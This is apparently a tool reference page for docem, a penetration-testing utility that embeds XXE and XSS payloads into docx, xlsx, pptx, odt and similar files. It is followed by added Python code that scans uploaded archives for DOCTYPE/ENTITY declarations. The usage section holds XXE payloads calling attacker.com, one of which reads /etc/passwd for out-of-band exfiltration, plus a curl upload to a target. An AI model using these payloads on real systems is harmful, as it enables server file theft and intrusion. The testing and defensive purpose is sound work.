Description
docem embeds XXE and XSS payloads into Office documents (docx, odt, pptx, xlsx) and other XML-based file formats. When a server parses the uploaded document with an XML parser that resolves external entities (XXE) or renders its contents in a browser (XSS), the embedded payload triggers. This makes it a standard tool for testing file-upload endpoints that process user-supplied documents.
Installation
```bash
git clone https://github.com/whitel1st/docem.git
cd docem
pip3 install -r requirements.txt
```
Basic Usage
```bash
# Embed XXE in docx
python3 docem.py -s sample.docx -pt xxe -o evil.docx

# Embed XSS in docx
python3 docem.py -s sample.docx -pt xss -o evil.docx
```
Advanced Usage
```bash
# Custom XXE payload
python3 docem.py -s sample.docx -pt xxe -pm '<!ENTITY xxe SYSTEM "http://attacker.com/xxe">' -o evil.docx

# OXML_XXE mode (embed in all XML files within the OOXML archive)
python3 docem.py -s sample.docx -pt xxe -pm all -o evil.docx

# Target OOB exfiltration
python3 docem.py -s sample.docx -pt xxe -pm '<!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">%dtd;' -o evil.docx

# Supported formats: docx, xlsx, pptx, odt, ods, odp, svg
python3 docem.py -s sample.xlsx -pt xxe -o evil.xlsx
python3 docem.py -s sample.pptx -pt xxe -o evil.pptx
```
Common Workflows
```bash
# File upload XXE testing
# Step 1: Create payload document
python3 docem.py -s template.docx -pt xxe -o evil.docx

# Step 2: Upload to target file upload endpoint
curl -F "file=@evil.docx" https://target.com/upload

# Step 3: Monitor OOB callback
# Check Interactsh/Burp Collaborator for DNS/HTTP callbacks

# XSS via document
python3 docem.py -s template.docx -pt xss -o xss.docx
# Upload; if the server renders the document in a browser context, the XSS fires
```
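The workflow above only succeeds when the receiving application inflates the package and hands its XML parts to an entity-resolving parser. The other side of that test is the upload gate a defender puts in front of the parser. The following is an added example, not part of docem or of the original page: it unpacks a docx/xlsx/pptx/odt-style archive, checks every XML member for the DOCTYPE/ENTITY declarations an XXE embedding needs, and refuses oversized members. The minimal packages, the `example.invalid` entity URL and the 10 MiB member limit are constructed for the example.

```python
import io
import re
import zipfile

# Declarations an XXE payload depends on: a DOCTYPE (which carries the internal
# DTD subset) or an ENTITY definition. Genuine Office/ODF parts never carry
# either, so a match is a reliable reject signal. Case-insensitive on purpose:
# lenient parsers may accept lowercase keywords even though XML does not.
DECL_RE = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)

# Archive members that are XML: OOXML parts (.xml, .rels) and ODF parts (.xml).
XML_SUFFIXES = (".xml", ".rels")

# Refuse to inflate any single member larger than this (guards against zip
# bombs hidden behind a document extension). Constructed limit for the example.
MAX_MEMBER_BYTES = 10 * 1024 * 1024


def scan_xml_bytes(member: str, content: bytes) -> list:
    """Return (member, keyword) findings for one XML part (also usable for a bare SVG)."""
    return [(member, m.group(1).decode("ascii").upper())
            for m in DECL_RE.finditer(content)]


def scan_zipped_xml(data: bytes) -> list:
    """Scan every XML member of a docx/xlsx/pptx/odt-style archive for DTD declarations."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(XML_SUFFIXES):
                continue
            if info.file_size > MAX_MEMBER_BYTES:
                findings.append((info.filename, "OVERSIZED"))
                continue
            findings.extend(scan_xml_bytes(info.filename, zf.read(info)))
    return findings


def is_upload_acceptable(data: bytes) -> bool:
    """Gate for an upload handler: True only when no member carries a DOCTYPE/ENTITY."""
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return False  # not an OOXML/ODF package at all
    return scan_zipped_xml(data) == []


# --- constructed sample packages (not real documents) -----------------------
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"


def build_docx(document_xml: bytes) -> bytes:
    """Build a minimal docx-like package around a given word/document.xml."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    b'<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("_rels/.rels",
                    b'<?xml version="1.0"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/>')
        zf.writestr("word/document.xml", document_xml)
    return buf.getvalue()


CLEAN_DOCX = build_docx(
    b'<?xml version="1.0"?><w:document xmlns:w="%s"><w:body/></w:document>' % W_NS.encode())

# Same package with a DOCTYPE declaring an external entity, the shape an XXE
# embedding tool produces. The URL is a deliberately unroutable placeholder.
TAINTED_DOCX = build_docx(
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE w:document [<!ENTITY xxe SYSTEM "http://example.invalid/x">]>'
    b'<w:document xmlns:w="%s"><w:body>&xxe;</w:body></w:document>' % W_NS.encode())

if __name__ == "__main__":
    for label, pkg in (("clean", CLEAN_DOCX), ("tainted", TAINTED_DOCX)):
        print(label, is_upload_acceptable(pkg), scan_zipped_xml(pkg))
```

The scan is a gate, not a substitute for a safe parser: whatever passes it should still be parsed with DTD processing and external entity resolution disabled (for Python, defusedxml or lxml with `resolve_entities=False`). A `<!DOCTYPE` inside a comment or CDATA section would also be flagged; for an upload filter that false positive is the right trade-off.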